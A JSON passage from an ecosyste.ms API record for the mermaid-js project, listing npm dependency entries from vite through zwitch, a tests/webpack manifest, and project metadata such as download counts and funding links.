vite@4.3.9)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865004,"package_name":"unpipe@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865005,"package_name":"unplugin-vue-components@0.25.0(rollup@2.79.1)(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865007,"package_name":"unplugin@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865008,"package_name":"untildify@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865009,"package_name":"upath@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865010,"package_name":"update-browserslist-db@1.0.10(browserslist@4.21.5)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865011,"package_name":"uri-js@4.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865012,"package_name":"url-parse@1.5.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865013,"package_name":"util-deprecate@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865014,"package_name":"utils-merge@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865015,"package_name":"uuid@8.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865016,"package_name":"uuid@9.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865017,"package_name":"uvu@0.5.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865018,"package_name":"v8-compile-cache-lib@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865019,"package_name":"v8-to-istanbul@9.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865020,"package_name":"validate-npm-package-license@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865021,"package_name":"vary@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865022,"package_name":"verror@1.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865023,"package_name":"vfile-message@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865024,"package_name":"vfile@5.3.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865025,"package_name":"vite-node@0.34.0(@types","ecosystem":"npm","requirements":"node@18.16.0)","direct":false,"kind":"development","optional":false},{"id":14013865028,"package_name":"vite-plugin-istanbul@4.1.0(vite@4.3.9)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865029,"package_name":"vite-plugin-pwa@0.16.0(vite@4.3.9)(workbox-build@7.0.0)(workbox-window@7.0.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865031,"package_name":"vite@4.3.9(@types","ecosystem":"npm","requirements":"node@18.16.0)","direct":false,"kind":"development","optional":false},{"id":14013865032,"package_name":"vite@4.4.9(@types","ecosystem":"npm","requirements":"node@18.16.0)","direct":false,"kind":"development","optional":false},{"id":14013865033,"package_name":"vitepress-plugin-search@1.0.4-alpha.20(flexsearch@0.7.31)(vitepress@1.0.0-alpha.72)(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865034,"package_name":"vitepress@1.0.0-alpha.72(@algolia","ecosystem":"npm","requirements":"client-search@4.19.1)(@types","direct":false,"kind":"development","optional":false},{"id":14013865036,"package_name":"vitepress@1.0.0-rc.20(@algolia","ecosystem":"npm","requirements":"client-search@4.19.1)(@types","direct":false,"kind":"development","optional":false},{"id":14013865037,"package_name":"vitest@0.34.0(@vitest","ecosystem":"npm","requirements":"ui@0.34.0)(jsdom@22.0.0)","direct":false,"kind":"development","optional":false},{"id":14013865039,"package_name":"vscode-json-languageservice@4.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865040,"package_name":"vscode-languageserver-textdocument@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865042,"package_name":"vscode-languageserver-textdocument@1.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865043,"package_name":"vscode-languageserver-types@3.17.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865044,"package_name":"vscode-nls@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865045,"package_name":"vscode-oniguruma@1.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865046,"package_name":"vscode-textmate@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865047,"package_name":"vscode-uri@3.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865050,"package_name":"vscode-uri@3.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865051,"package_name":"vue-demi@0.14.5(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865052,"package_name":"vue@3.3.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865053,"package_name":"vuex@4.1.0(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865055,"package_name":"w3c-hr-time@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865057,"package_name":"w3c-xmlserializer@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865058,"package_name":"w3c-xmlserializer@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865059,"package_name":"wait-on@7.0.1(debug@4.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865060,"package_name":"walker@1.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865061,"package_name":"watchpack@2.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865062,"package_name":"wbuf@1.7.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865063,"package_name":"web-streams-polyfill@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865064,"package_name":"web-worker@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865065,"package_name":"webdriver@7.30.0(typescript@5.1.3)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865066,"package_name":"webidl-conversions@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865067,"package_name":"webidl-conversions@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865068,"package_name":"webidl-conversions@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865069,"package_name":"webpack-cli@4.10.0(webpack-dev-server@4.11.1)(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865070,"package_name":"webpack-dev-middleware@5.3.3(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865071,"package_name":"webpack-dev-server@4.11.1(webpack-cli@4.10.0)(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865073,"package_name":"webpack-merge@5.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865074,"package_name":"webpack-sources@3.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865075,"package_name":"webpack-virtual-modules@0.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865076,"package_name":"webpack@5.88.2(esbuild@0.19.0)(webpack-cli@4.10.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865077,"package_name":"websocket-driver@0.7.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865078,"package_name":"websocket-extensions@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865079,"package_name":"whatwg-encoding@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865080,"package_name":"whatwg-mimetype@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865081,"package_name":"whatwg-url@10.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865082,"package_name":"whatwg-url@11.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865083,"package_name":"whatwg-url@12.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865084,"package_name":"whatwg-url@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865085,"package_name":"whatwg-url@7.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865086,"package_name":"which-boxed-primitive@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865087,"package_name":"which-module@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865088,"package_name":"which-typed-array@1.1.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865089,"package_name":"which@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865090,"package_name":"which@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865091,"package_name":"why-is-node-running@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865092,"package_name":"widest-line@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865093,"package_name":"wildcard@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865095,"package_name":"word-wrap@1.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865892,"package_name":"wordwrap@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865893,"package_name":"workbox-background-sync@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865894,"package_name":"workbox-broadcast-update@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865895,"package_name":"workbox-build@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865896,"package_name":"workbox-cacheable-response@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865897,"package_name":"workbox-core@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865898,"package_name":"workbox-expiration@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865899,"package_name":"workbox-google-analytics@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865900,"package_name":"workbox-navigation-preload@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865901,"package_name":"workbox-precaching@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865902,"package_name":"workbox-range-requests@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865903,"package_name":"workbox-recipes@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865904,"package_name":"workbox-routing@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865905,"package_name":"workbox-strategies@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865906,"package_name":"workbox-streams@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865907,"package_name":"workbox-sw@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865908,"package_name":"workbox-window@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865909,"package_name":"wrap-ansi@6.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865910,"package_name":"wrap-ansi@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865911,"package_name":"wrappy@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013865912,"package_name":"write-file-atomic@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865913,"package_name":"write-file-atomic@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865914,"package_name":"ws@8.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865915,"package_name":"ws@8.13.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865916,"package_name":"ws@8.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013865917,"package_name":"ws@8.9.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866864,"package_name":"xdg-basedir@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866865,"package_name":"xml-name-validator@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866866,"package_name":"xmlbuilder@15.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866867,"package_name":"xmlchars@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866868,"package_name":"xxhashjs@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866869,"package_name":"y18n@4.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866870,"package_name":"y18n@5.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866871,"package_name":"yallist@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866872,"package_name":"yallist@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866873,"package_name":"yaml@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013866874,"package_name":"yargs-parser@18.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866875,"package_name":"yargs-parser@20.2.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866876,"package_name":"yargs-parser@21.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866877,"package_name":"yargs@15.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013866878,"package_name":"yargs@17.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013867321,"package_name":"yargs@17.7.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013867322,"package_name":"yauzl@2.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013867323,"package_name":"yn@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013867324,"package_name":"yocto-queue@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013867325,"package_name":"yocto-queue@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013867326,"package_name":"zwitch@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"tests/webpack/package.json","sha":null,"kind":"manifest","created_at":"2023-09-29T07:58:17.561Z","updated_at":"2023-09-29T07:58:17.561Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/tests/webpack/package.json","dependencies":[{"id":14013868552,"package_name":"mermaid","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":14013868556,"package_name":"@mermaid-js/mermaid-example-diagram","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":14013869782,"package_name":"webpack","ecosystem":"npm","requirements":"^5.88.2","direct":true,"kind":"development","optional":false},{"id":14013869783,"package_name":"webpack-cli","ecosystem":"npm","requirements":"^4.10.0","direct":true,"kind":"development","optional":false},{"id":14013869784,"package_name":"webpack-dev-server","ecosystem":"npm","requirements":"^4.11.1","direct":true,"kind":"development","optional":false}]}],"score":39.13274434839354,"created_at":"2025-09-04T15:51:34.329Z","updated_at":"2025-10-07T08:22:48.961Z","avatar_url":"https://github.com/mermaid-js.png","language":"TypeScript","category":null,"sub_category":null,"monthly_downloads":10418648,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"readme_doi_urls":[],"works":{},"citation_counts":{},"total_citations":0,"keywords_from_contributors":["argument-parser","embedded","closember","cryptocurrencies","distributed","wx","tk","gtk","document","qt"],"project_url":"https://science.ecosyste.ms/api/v1/projects/57922","html_url":"https://science.ecosyste.ms/projects/57922","bibtex_url":"https://science.ecosyste.ms/projects/57922/export.bibtex","apalike_url":"https://science.ecosyste.ms/projects/57922/export.apalike"}